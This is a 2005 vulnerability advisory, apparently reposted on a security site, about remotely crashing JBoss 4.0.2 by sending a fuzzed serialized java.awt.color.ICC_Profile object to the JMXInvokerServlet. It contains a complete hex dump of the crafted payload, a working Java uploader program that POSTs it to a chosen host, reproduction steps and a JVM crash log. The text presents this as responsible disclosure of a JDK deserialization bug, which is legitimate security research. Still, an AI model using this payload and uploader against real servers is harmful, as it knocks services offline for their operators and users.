Remotely DoSing JBoss 4.0.2 with serialized java objects

2005.11.05
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 7.8/10
Impact Subscore: 6.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

=+============================================================= Remotely DoSing JBoss 4.0.2 with serialized java objects Implications of serialisation vulnerabilies in JDK =+============================================================= Author: Marc Schoenefeld , illegalaccess.org marc/at/illegalaccess.org =+============================================================= Date: November 4, 2005 =+============================================================= As I had the chance to demonstrate on HackInTheBox 2005 the JDK 1.4.2 was vulnerable to a font deserialization bug. This can be used to crash the default installation of every version of JBoss application on Win32, up to the current 4.0.2 version. JBoss offers the possibility of invoking JMX methods with the URL: http://host:8080/invoker/JMXInvokerServlet I fuzzed several values in the GRAY.pf font file, and created a serialized font object from it. The resulting file can be found in [Appendix:1]. Then I wrote a small program [Appendix:2] that POSTs the object via HTTP to the /invoker/JMXInvokerServlet. The following deserialisation call crashes the underlying JDK [Appendix:3]. To reconstruct run 1) a JBoss server in the default installation 2) un-xxd the file iccprofile.ser.xxd to iccprofile.ser 3) Run InvokerUpload.java [Appendix:2] with two arguments, like java InvokerUpload 127.0.0.1 iccprofile.ser There are several other vulnerable object types that can be triggered that way from remote like several classes from rt.jar that expose this bug also in 1.4.2_09 and 1.5.0_05, as shown in [Appendix:4] and [Appendix:5]. Even worse these bugs crash the JVM on all platforms (WOCE, write once crash everyhere). Sun is aware of this particular bug since 7/17/05. In order to finally support the safe release of a fix and an official advisory from Sun I rewill not disclose the serialized vulnerable version of the affected java.lang.* classes until the release of a fix. After my bug report Sun announced fixes in 5.0U6, 1.4.2_11 and 1.3.1_17. It shall be noted that there is no vulnerability problem with JBoss itself, as this is a flaw in the JDK only. Problems in the java serialisation API are not new, see http://sunsolve.sun.com/search/document.do?assetkey=1-26-57707-1 JBoss is used only for demonstration purposes to show a good product may suffer from vulnerabilities in the layer below. Therefore every architecture that uses the serialisation API is potentially affected. Sincerely Marc Schnefeld =+============================================================= [Appendix:1] iccprofile.ser.xxd 0000000: aced 0005 7372 001e 6a61 7661 2e61 7774 ....sr..java.awt 0000010: 2e63 6f6c 6f72 2e49 4343 5f50 726f 6669 .color.ICC_Profi 0000020: 6c65 4772 6179 f064 2ff1 f299 a2a7 0200 leGray.d/....... 0000030: 0078 7200 1a6a 6176 612e 6177 742e 636f .xr..java.awt.co 0000040: 6c6f 722e 4943 435f 5072 6f66 696c 65c9 lor.ICC_Profile. 0000050: 5794 b0cf c9ef 4203 0001 4900 1f69 6363 W.....B...I..icc 0000060: 5072 6f66 696c 6553 6572 6961 6c69 7a65 ProfileSerialize 0000070: 6444 6174 6156 6572 7369 6f6e 7870 0000 dDataVersionxp.. 0000080: 0001 7075 7200 025b 42ac f317 f806 0854 ..pur..[B......T 0000090: e002 0000 7870 0000 0000 0000 0278 4b43 ....xp.......xKC 00000a0: 4d53 0200 0000 6d6e 7472 4752 4159 5859 MS....mntrGRAYXY 00000b0: 5a20 005f 0007 001b 0011 001e 000f 6163 Z ._..........ac 00000c0: 7370 5355 4e57 0000 0001 4b4f 4441 4752 spSUNW....KODAGR 00000d0: 4159 0000 0000 0000 0000 0000 0001 0000 AY.............. 00000e0: f6d5 0001 0000 0000 d32b 0000 0000 0000 .........+...... 00000f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000100: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000110: 0000 0000 0000 0000 0000 0000 0006 6370 ..............cp 0000120: 7274 0000 00cc 0000 003f 6465 7363 0000 rt.......?desc.. 0000130: 010c 0000 0081 646d 6e64 0000 0190 0000 ......dmnd...... 0000140: 0060 7774 7074 0000 01f0 0000 0014 6b54 .`wtpt........kT 0000150: 5243 0000 0204 0000 000e 646d 6464 0000 RC........dmdd.. 0000160: 0214 0000 0064 7465 7874 0000 0000 434f .....dtext....CO 0000170: 5059 5249 4748 5420 2863 2920 3139 3937 PYRIGHT (c) 1997 0000180: 2045 6173 746d 616e 204b 6f64 616b 2c20 Eastman Kodak, 0000190: 416c 6c20 7269 6768 7473 2072 6573 6572 All rights reser 00001a0: 7665 642e 0000 6465 7363 0000 0000 0000 ved...desc...... 00001b0: 0027 4b4f 4441 4b20 4772 6179 7363 616c .'KODAK Grayscal 00001c0: 6520 436f 6e76 6572 7369 6f6e 202d 2047 e Conversion - G 00001d0: 616d 6d61 2031 2e30 0000 0000 0000 0000 amma 1.0........ 00001e0: 0000 0000 0000 0000 00d8 b240 0000 0000 ........... (at) .. (dot) . [email concealed] 00001f0: 00ff ffff ff11 0100 00c4 087e 0000 0000 ...........~.... 0000200: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000210: 00c4 087e 0000 0000 00c4 087e 000c 0000 ...~.......~.... 0000220: 0001 0000 0000 0000 0000 6465 7363 0000 ..........desc.. 0000230: 0000 0000 0006 4b4f 4441 4b00 0000 0000 ......KODAK..... 0000240: 0000 0000 0000 0000 0000 0000 d8b2 4000 ..............@. 0000250: 0000 0000 ffff ffff 0809 8a00 e008 8a00 ................ 0000260: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000270: 0000 0000 e008 8a00 0000 0000 e008 8a00 ................ 0000280: d82c 8a00 d82c 8a00 0000 5859 5a20 0000 .,...,....XYZ .. 0000290: 0000 0000 f6d5 0001 0000 0000 d32b 6375 .............+cu 00002a0: 7276 0000 0000 0000 0001 0100 0000 6465 rv............de 00002b0: 7363 0000 0000 0000 000a 4772 6179 7363 sc........Graysc 00002c0: 616c 6500 0000 0000 0000 0000 0000 0000 ale............. 00002d0: 0000 0000 d8b2 4000 0000 0000 ffff ffff ...... (at) ....... (dot) . [email concealed] 00002e0: 0809 8a00 e008 8a00 0000 0000 0000 0000 ................ 00002f0: 0000 0000 0000 0000 0000 0000 e008 8a00 ................ 0000300: 0000 0000 e008 8a00 d82c 8a00 d82c 8a00 .........,...,.. 0000310: 0000 78 ..x =+============================================================= [Appendix:2]: InvokerUpload.java import java.io.BufferedReader; import java.io.ByteArrayInputStream; import java.io.FileInputStream; import java.io.InputStreamReader; import java.io.ObjectInputStream; import java.io.PrintWriter; import java.net.HttpURLConnection; import java.net.URL; public class InvokerUpload { public static void main(String[] a) throws Exception { URL url = new URL ("http://"+a[0]+":8080/invoker/JMXInvokerServlet"); FileInputStream fis = new FileInputStream(a[1]); byte[] b = new byte[fis.available()]; fis.read(b); System.out.println(fis.available()); HttpURLConnection con = (HttpURLConnection)url.openConnection(); con.setDoOutput(true); con.connect(); con.getOutputStream().write(b); con.getOutputStream().close(); BufferedReader br = new BufferedReader(new InputStreamReader(con.getInputStream())); String res = br.readLine(); System.out.println(res); ByteArrayInputStream bis = new ByteArrayInputStream(b); ObjectInputStream ois = new ObjectInputStream(bis); Object o = ois.readObject(); } } =+============================================================= [Appendix:3] Crash of JBoss 4.0.2 with JDK 1.4.2_08 , font object 23:36:11,359 INFO [Server] JBoss (MX MicroKernel) [4.0.2 (build: CVSTag=JBoss_4_0_2 date=200505022023)] Started in 13s:359ms An unexpected exception has been detected in native code outside the VM. Unexpected Signal : EXCEPTION_ACCESS_VIOLATION (0xc0000005) occurred at PC=0x46F8155 Function=[Unknown.] Library=C:java1.4.2


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top